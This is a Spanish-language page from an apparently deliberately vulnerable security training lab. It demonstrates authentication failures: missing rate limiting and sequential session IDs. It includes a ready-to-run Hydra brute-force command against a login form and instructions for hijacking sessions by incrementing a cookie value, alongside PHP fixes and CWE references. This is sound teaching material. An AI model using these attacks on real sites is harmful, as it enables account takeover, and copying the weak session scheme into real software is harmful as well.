🔐 Iniciar Sesión

Accede a tu cuenta de Nexo

← Volver al inicio

💡 Pistas del lab

Brute force: No hay límite de intentos. Probá con Hydra o manualmente.

Usuarios conocidos:

alice — password de A04
bob — password de A04
admin — password de A02

A07:2025 Intermedia

🔴 VULNERABLE

Authentication Failures

Este login tiene dos problemas:

Sin rate limiting: Podés hacer brute force sin límite de intentos
Session ID predecible: Después de login, el session_id es un entero secuencial

# 1. Brute force con Hydra:
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  localhost http-post-form \
  "/a07_login/:username=^USER^&password=^PASS^:F=incorrectas"

# 2. Session hijacking:
# Después de login, tu cookie es NEXO_SESS=1006
# Probá NEXO_SESS=1001, 1002, 1003...

Herramientas: Hydra Burp Suite Intruder curl

// 1. Rate limiting:
if (getFailedAttempts($ip) > 5) {
    sleep(30); // o bloquear temporalmente
}

// 2. Session ID seguro:
session_regenerate_id(true);
// PHP genera ID random de 128+ bits

Rockstar Games (2022)

Credential stuffing masivo sin rate limiting. Miles de cuentas comprometidas antes de detectarlo.

CWEs: CWE-307 CWE-384 CWE-521

🛡️ Ver versión segura